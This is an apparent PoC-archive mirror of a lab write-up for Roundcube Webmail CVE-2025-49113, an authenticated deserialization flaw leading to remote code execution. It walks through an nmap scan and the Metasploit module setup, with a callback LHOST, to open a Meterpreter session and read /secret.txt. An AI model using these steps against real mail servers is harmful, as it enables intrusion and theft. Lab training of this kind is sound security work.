Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-49113 PoC — Roundcube Webmail 安全漏洞

Source
https://github.com/ankitpandey383/roundcube-cve-2025-49113-lab
Associated Vulnerability
Title:Roundcube Webmail 安全漏洞 (CVE-2025-49113)
Description:Roundcube Webmail before 1.5.10 and 1.6.x before 1.6.11 allows remote code execution by authenticated users because the _from parameter in a URL is not validated in program/actions/settings/upload.php, leading to PHP Object Deserialization.
Description
Hands-on exploitation lab for Roundcube Webmail CVE-2025-49113 (authenticated PHP object deserialization → RCE) to read /secret.txt.
Readme
"DISCLAIMER: Educational Use Only"

# Roundcube Webmail RCE – CVE-2025-49113 Lab
This repository documents my step-by-step exploitation of **Roundcube Webmail CVE-2025-49113** in a controlled lab to obtain the secret stored in `/secret.txt`.
> ⚠️ **Disclaimer**  
> All work was performed against a lab / training environment that I am authorised to test.  
> Do **not** use these techniques against systems you do not own or administrate.
---
## Challenge
Roundcube Webmail is a browser-based, open-source PHP email client that connects to mailboxes via IMAP and sends mail via SMTP. It commonly runs on Apache or Nginx with MySQL/PostgreSQL/SQLite and is widely used in shared hosting environments.

**Vulnerability – CVE-2025-49113**

All Roundcube versions up to and including `1.6.10` (and `1.5.x` before `1.5.10`) contain a critical bug in `program/actions/settings/upload.php`. The `_from` parameter is not properly validated, which allows an authenticated attacker to trigger **unsafe PHP object deserialization** and achieve **remote code execution** with web server privileges.

**Lab credentials:**

- Username: `roundcube`  
- Password: `rcpass`  

**Goal:**  
> *What is the secret inside the `/secret.txt` file?*

---

## Lab Environment

- Attacker host: Kali / HackerBox with:
  - `nmap`
  - `msfconsole` (Metasploit 6)
- Target host: Roundcube Webmail on `172.20.2.57`
- Exploit used: `exploit/multi/http/roundcube_auth_rce_cve_2025_49113`
---
## Walkthrough

### Step 1 – Service discovery with Nmap
Command:
nmap -sV Target Machine
### Step 2 - Locating a PHP object deserialization exploit in Metasploit
# search php object deserialization
### Step 3 - Configuring the Roundcube exploit module
msf6 > use exploit/multi/http/roundcube_auth_rce_cve_2025_49113
msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set RHOSTS Target Machine
msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set LHOST Kali Machine
msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set USERNAME Target Machine 
msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set PASSWORD Target Machine
### Step 4 - Getting a Meterpreter session and reading /secret.txt
meterpreter > cat /secret.txt
File Snapshot

 [4.0K]  /data/pocs/445a763d0edce3fb0a8f8546395da1b87ddf545a
├── [ 619]  Defensive Recommendations
├── [1.0K]  License
├── [2.2K]  README.md
├── [106K]  Step-1.jpg
├── [138K]  Step-2.jpg
├── [ 66K]  Step-3.jpg
└── [100K]  Step-4.jpg

1 directory, 7 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →